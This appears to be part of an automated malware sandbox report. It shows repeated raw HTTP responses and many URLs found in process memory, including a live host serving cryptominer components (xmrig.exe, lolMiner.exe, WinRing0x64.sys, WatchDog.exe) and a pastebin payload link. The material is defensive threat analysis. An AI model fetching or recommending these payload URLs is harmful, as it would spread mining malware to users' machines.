                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.45Set-Cookie: js=KoiPYeUM-ADD2OERAzJw13mQMshJqYCnuOyCeavKyDeSCxCS1Dd0CmHwPOOdLXS7Cp9KvLt1DVFm6Obi6Fv4c0; path=/Cache-Control: no-cacheDate: Thu, 14 Nov 2024 11:20:11 GMTVary: Accept-LanguageVary: Accept-LanguageContent-Encoding: gzipData Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d c9 02 f1 70 7b 87 06 d2 de f2 79 8b 6d f2 2d 5f 0f 83 c1 dc bf 7e 68 08 0d a9 36 b9 7b 06 e1 ee 0d 06 9b 5b 75 b7 e8 8a b8 46 78 d4 4d 69 26 45 fd 99 63 8c 89 bf 78 3d a3 3d b4 4e 24 ad d5 5b c4 17 6e c0 29 2c ee 26 54 03 6b 79 dd 99 d3 6a ea 14 10 11 95 53 b3 58 eb 6f 90 e8 01 49 29 00 37 9b 5b 2d e2 12 d1 cf 02 7f 11 fe 09 1e f8 51 2b 75 0b c2 81 e9 41 1e 52 97 65 82 72 b9 46 3b 39 a7 35 9d a6 e1 7e 56 af f5 58 16 e6 3d 27 cc 03 13 9f 63 57 35 b2 1d 1b e3 5e af e7 46 a6 14 0d 32 ab 85 1b e4 29 be 5c ed 08 40 46 c4 ae b7 aa 12 cf be 88 d4 ec 2a 1f db 41 f6 e3 d5 c6 8d e6 ad 95 e6 d2 cd 66 63 05 36 a0 2c 2d 03 d7 30 4e f7 ba 8c 1b 5c c8 44 91 90 7e 07 fc ba 9c 0a cd 3a 43 09 9a 85 1a 52 40 6b ec 33 da 33 27 7a 78 7a a3 1e 8e 8d 26 16 bc ed 3c ec 83 52 42 b6 8f 58 e8 5b 3d 4e 8a 82 f2 59 17 81 56 12 e8 0f df 4a f2 08 5a 70 da 96 56 db c3 64 da 67 f1 62 1b ba 06 35 b4 1a 86 d0 ea 95 5a ca 17 e5 91 51 ca 58 8d ca d7 5a 2b 63 75 a6 77 5f 96 6f a1 e9 c1 aa 4e 41 60 d0 fe 10 c9 e2 94 4a 14 24 6b ab 8f a0 9b ef 20 92 89 fa 06 4e 93 39 6f f9 4e fd b8 a2 35 d0 19 68 6a 34 97 17 52 27 80 3b af c4 3b 04 13 a8 0f c1 f0 45 13 9d 1a f9 7d 85 e5 79 f9 1e a2 3a 53 17 2e 54 44 9f 5a b5 3b b9 4c 50 1d 1b f0 e9 7f f2 b9 cc 7f ee d3 a1 34 dc 26 c1 ae d5 56 9f 20 f8 31 a4 38 84 87 e1 a8 7c 77 15 1c 4b 59 dc c6 d8 28 30 a3 12 83 90 a1 e1 f5 8b f4 74 3b 21 d9 ae 35 2b 7b 90 17 7d b8 0c 0d 44 bf 3f a3 a5 e6 d2 b2 61 f3 30 5c 98 9e a6 d7 87 cd 4b f7 17 32 0c 27 7f 00 05 00 00 0d 0a 30 0d Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.45Set-Cookie: js=KoiPYeUM-ADD2OERAzJw13mQMshJqYCnuOyCeavKyDeSCxCS1Dd0CmHwPOOdLXS7Cp9KvLt1DVFm6Obi6Fv4c0; path=/Cache-Control: no-cacheDate: Thu, 14 Nov 2024 11:20:11 GMTVary: Accept-LanguageVary: Accept-LanguageContent-Encoding: gzipData Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d c9 02 f1 70 7b 87 06 d2 de f2 79 8b 6d f2 2d 5f 0f 83 c1 dc bf 7e 68 08 0d a9 36 b9 7b 06 e1 ee 0d 06 9b 5b 75 b7 e8 8a b8 46 78 d4 4d 69 26 45 fd 99 63 8c 89 bf 78 3d a3 3d b4 4e 24 ad d5 5b c4 17 6e c0 29 2c ee 26 54 03 6b 79 dd 99 d3 6a ea 14 10 11 95 53 b3 58 eb 6f 90 e8 01 49 29 00 37 9b 5b 2d e2 12 d1 cf 02 7f 11 fe 09 1e f8 51 2b 75 0b c2 81 e9 41 1e 52 97 65 82 72 b9 46 3b 39 a7 35 9d a6 e1 7e 56 af f5 58 16 e6 3d 27 cc 03 13 9f 63 57 35 b2 1d 1b e3 5e af e7 46 a6 14 0d 32 ab 85 1b e4 29 be 5c ed 08 40 46 c4 ae b7 aa 12 cf be 88 d4 ec 2a 1f db 41 f6 e3 d5 c6 8d e6 ad 95 e6 d2 cd 66 63 05 36 a0 2c 2d 03 d7 30 4e f7 ba 8c 1b 5c c8 44 91 90 7e 07 fc ba 9c 0a cd 3a 43 09 9a 85 1a 52 40 6b ec 33 da 33 27 7a 78 7a a3 1e 8e 8d 26 16 bc ed 3c ec 83 52 42 b6 8f 58 e8 5b 3d 4e 8a 82 f2 59 17 81 56 12 e8 0f df 4a f2 08 5a 70 da 96 56 db c3 64 da 67 f1 62 1b ba 06 35 b4 1a 86 d0 ea 95 5a ca 17 e5 91 51 ca 58 8d ca d7 5a 2b 63 75 a6 77 5f 96 6f a1 e9 c1 aa 4e 41 60 d0 fe 10 c9 e2 94 4a 14 24 6b ab 8f a0 9b ef 20 92 89 fa 06 4e 93 39 6f f9 4e fd b8 a2 35 d0 19 68 6a 34 97 17 52 27 80 3b af c4 3b 04 13 a8 0f c1 f0 45 13 9d 1a f9 7d 85 e5 79 f9 1e a2 3a 53 17 2e 54 44 9f 5a b5 3b b9 4c 50 1d 1b f0 e9 7f f2 b9 cc 7f ee d3 a1 34 dc 26 c1 ae d5 56 9f 20 f8 31 a4 38 84 87 e1 a8 7c 77 15 1c 4b 59 dc c6 d8 28 30 a3 12 83 90 a1 e1 f5 8b f4 74 3b 21 d9 ae 35 2b 7b 90 17 7d b8 0c 0d 44 bf 3f a3 a5 e6 d2 b2 61 f3 30 5c 98 9e a6 d7 87 cd 4b f7 17 32 0c 27 7f 00 05 00 00 0d 0a 30 0d Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.45Set-Cookie: js=KoiPYeUM-ADD2OERAzJw13mQMshJqYCnuOyCeavKyDeSCxCS1Dd0CmHwPOOdLXS7Cp9KvLt1DVFm6Obi6Fv4c0; path=/Cache-Control: no-cacheDate: Thu, 14 Nov 2024 11:20:11 GMTVary: Accept-LanguageVary: Accept-LanguageContent-Encoding: gzipData Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d c9 02 f1 70 7b 87 06 d2 de f2 79 8b 6d f2 2d 5f 0f 83 c1 dc bf 7e 68 08 0d a9 36 b9 7b 06 e1 ee 0d 06 9b 5b 75 b7 e8 8a b8 46 78 d4 4d 69 26 45 fd 99 63 8c 89 bf 78 3d a3 3d b4 4e 24 ad d5 5b c4 17 6e c0 29 2c ee 26 54 03 6b 79 dd 99 d3 6a ea 14 10 11 95 53 b3 58 eb 6f 90 e8 01 49 29 00 37 9b 5b 2d e2 12 d1 cf 02 7f 11 fe 09 1e f8 51 2b 75 0b c2 81 e9 41 1e 52 97 65 82 72 b9 46 3b 39 a7 35 9d a6 e1 7e 56 af f5 58 16 e6 3d 27 cc 03 13 9f 63 57 35 b2 1d 1b e3 5e af e7 46 a6 14 0d 32 ab 85 1b e4 29 be 5c ed 08 40 46 c4 ae b7 aa 12 cf be 88 d4 ec 2a 1f db 41 f6 e3 d5 c6 8d e6 ad 95 e6 d2 cd 66 63 05 36 a0 2c 2d 03 d7 30 4e f7 ba 8c 1b 5c c8 44 91 90 7e 07 fc ba 9c 0a cd 3a 43 09 9a 85 1a 52 40 6b ec 33 da 33 27 7a 78 7a a3 1e 8e 8d 26 16 bc ed 3c ec 83 52 42 b6 8f 58 e8 5b 3d 4e 8a 82 f2 59 17 81 56 12 e8 0f df 4a f2 08 5a 70 da 96 56 db c3 64 da 67 f1 62 1b ba 06 35 b4 1a 86 d0 ea 95 5a ca 17 e5 91 51 ca 58 8d ca d7 5a 2b 63 75 a6 77 5f 96 6f a1 e9 c1 aa 4e 41 60 d0 fe 10 c9 e2 94 4a 14 24 6b ab 8f a0 9b ef 20 92 89 fa 06 4e 93 39 6f f9 4e fd b8 a2 35 d0 19 68 6a 34 97 17 52 27 80 3b af c4 3b 04 13 a8 0f c1 f0 45 13 9d 1a f9 7d 85 e5 79 f9 1e a2 3a 53 17 2e 54 44 9f 5a b5 3b b9 4c 50 1d 1b f0 e9 7f f2 b9 cc 7f ee d3 a1 34 dc 26 c1 ae d5 56 9f 20 f8 31 a4 38 84 87 e1 a8 7c 77 15 1c 4b 59 dc c6 d8 28 30 a3 12 83 90 a1 e1 f5 8b f4 74 3b 21 d9 ae 35 2b 7b 90 17 7d b8 0c 0d 44 bf 3f a3 a5 e6 d2 b2 61 f3 30 5c 98 9e a6 d7 87 cd 4b f7 17 32 0c 27 7f 00 05 00 00 0d 0a 30 0d Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.4.45Set-Cookie: js=KoiPYeUM-ADD2OERAzJw13mQMshJqYCnuOyCeavKyDeSCxCS1Dd0CmHwPOOdLXS7Cp9KvLt1DVFm6Obi6Fv4c0; path=/Cache-Control: no-cacheDate: Thu, 14 Nov 2024 11:20:11 GMTVary: Accept-LanguageVary: Accept-LanguageContent-Encoding: gzipData Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d c9 02 f1 70 7b 87 06 d2 de f2 79 8b 6d f2 2d 5f 0f 83 c1 dc bf 7e 68 08 0d a9 36 b9 7b 06 e1 ee 0d 06 9b 5b 75 b7 e8 8a b8 46 78 d4 4d 69 26 45 fd 99 63 8c 89 bf 78 3d a3 3d b4 4e 24 ad d5 5b c4 17 6e c0 29 2c ee 26 54 03 6b 79 dd 99 d3 6a ea 14 10 11 95 53 b3 58 eb 6f 90 e8 01 49 29 00 37 9b 5b 2d e2 12 d1 cf 02 7f 11 fe 09 1e f8 51 2b 75 0b c2 81 e9 41 1e 52 97 65 82 72 b9 46 3b 39 a7 35 9d a6 e1 7e 56 af f5 58 16 e6 3d 27 cc 03 13 9f 63 57 35 b2 1d 1b e3 5e af e7 46 a6 14 0d 32 ab 85 1b e4 29 be 5c ed 08 40 46 c4 ae b7 aa 12 cf be 88 d4 ec 2a 1f db 41 f6 e3 d5 c6 8d e6 ad 95 e6 d2 cd 66 63 05 36 a0 2c 2d 03 d7 30 4e f7 ba 8c 1b 5c c8 44 91 90 7e 07 fc ba 9c 0a cd 3a 43 09 9a 85 1a 52 40 6b ec 33 da 33 27 7a 78 7a a3 1e 8e 8d 26 16 bc ed 3c ec 83 52 42 b6 8f 58 e8 5b 3d 4e 8a 82 f2 59 17 81 56 12 e8 0f df 4a f2 08 5a 70 da 96 56 db c3 64 da 67 f1 62 1b ba 06 35 b4 1a 86 d0 ea 95 5a ca 17 e5 91 51 ca 58 8d ca d7 5a 2b 63 75 a6 77 5f 96 6f a1 e9 c1 aa 4e 41 60 d0 fe 10 c9 e2 94 4a 14 24 6b ab 8f a0 9b ef 20 92 89 fa 06 4e 93 39 6f f9 4e fd b8 a2 35 d0 19 68 6a 34 97 17 52 27 80 3b af c4 3b 04 13 a8 0f c1 f0 45 13 9d 1a f9 7d 85 e5 79 f9 1e a2 3a 53 17 2e 54 44 9f 5a b5 3b b9 4c 50 1d 1b f0 e9 7f f2 b9 cc 7f ee d3 a1 34 dc 26 c1 ae d5 56 9f 20 f8 31 a4 38 84 87 e1 a8 7c 77 15 1c 4b 59 dc c6 d8 28 30 a3 12 83 90 a1 e1 f5 8b f4 74 3b 21 d9 ae 35 2b 7b 90 17 7d b8 0c 0d 44 bf 3f a3 a5 e6 d2 b2 61 f3 30 5c 98 9e a6 d7 87 cd 4b f7 17 32 0c 27 7f 00 05 00 00 0d 0a 30 0d Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: RegSvcs.exe, 00000021.00000002.1979634479.000000000247D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81
                Source: aspnet_regiis.exe, 00000007.00000002.1804352818.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804039273.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1815812441.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1761053365.00000000028D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/
                Source: aspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/3
                Source: aspnet_regiis.exe, 00000007.00000002.1804352818.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/35
                Source: aspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/5
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WatchDog.exe
                Source: Installer.exe, 0000001F.00000003.1911606437.0000000003B22000.00000040.00001000.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1911910899.000000000038C000.00000004.00000001.01000000.0000000A.sdmp, RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exe
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WatchDog.exeP
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WinRing0x64.sys
                Source: Installer.exe, 0000001F.00000003.1911606437.0000000003B22000.00000040.00001000.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1911910899.000000000038C000.00000004.00000001.01000000.0000000A.sdmp, RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WinRing0x64.sysChttps://pastebin.com/raw/dq3hWX27
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/WinRing0x64.sysP
                Source: aspnet_regiis.exe, 00000007.00000002.1804512580.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1803598708.0000000002CFB000.00000004.00000010.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804574864.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1799857013.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804443688.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1760794502.0000000002936000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816640309.000000000293B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1804509482.00000000024FA000.00000004.00000010.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1760859556.000000000293A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1760915716.0000000002925000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816099745.0000000002925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
                Source: aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1760970169.000000000291E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exeD
                Source: aspnet_regiis.exe, 00000007.00000003.1799258443.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804512580.0000000002EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exeq
                Source: aspnet_regiis.exe, 00000007.00000002.1804352818.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/d
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/lolMiner.exe
                Source: aspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/m
                Source: aspnet_regiis.exe, 00000008.00000003.1760970169.0000000002912000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/t
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/xmrig.exe
                Source: RegSvcs.exe, 00000021.00000002.1979634479.000000000247D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/xmrig.exeP
                Source: aspnet_regiis.exe, 00000008.00000003.1761053365.00000000028A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81:80/conhost.exe
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81D
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Installer.exe.29.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002540000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.33.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002540000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.33.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002540000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.33.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002540000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.33.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                Source: powershell.exe, 00000024.00000002.1947797275.0000000008AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microIb~
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1816054910.0000000002913000.00000004.00000020.00020000.00000000.sdmp, MPDIZKEMMIDUY52JFU3.exe.8.dr, OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe.7.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                Source: Installer.exe.29.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0t
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000007.00000003.1646545677.00000000056CF000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1618174910.0000000004D8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
